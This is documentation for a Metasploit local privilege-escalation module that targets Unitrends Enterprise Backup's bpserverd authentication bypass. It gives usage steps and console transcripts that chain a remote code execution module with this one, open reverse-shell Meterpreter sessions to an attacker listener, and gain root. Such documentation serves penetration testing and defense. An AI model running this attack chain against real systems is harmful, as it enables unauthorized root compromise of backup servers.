dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.md

3.2 KiB
Raw Permalink Blame History

Vulnerable Application

It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system. This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the localhost by dropping a python script on the local file system. Unitrends stopped bpserverd from listening remotely on version 10.

Vulnerable Application

This module has been tested successfully on:

  • UEB 9.2
  • UEB 10.0

Verification Steps

  1. Get a user shell with exploit/linux/http/ueb_api_rce with set target 1
  2. use exploit/linux/local/ueb_bpserverd_privesc
  3. set session [SESSION]
  4. exploit
  5. A root meterpreter session should have been opened successfully

Scenarios

UEB 10.0 on CentOS 6.5

msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

UEB 9.2 on CentOS 6

resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
resource (ueb_priv.rb)> set rhost 1.1.1.1
rhost => 1.1.1.1
resource (ueb_priv.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (ueb_priv.rb)> set target 1
target => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
resource (ueb_priv.rb)> set session 1
session => 1
resource (ueb_priv.rb)> run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
[*] Writing privesc script to '/tmp/.sDjn0m'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0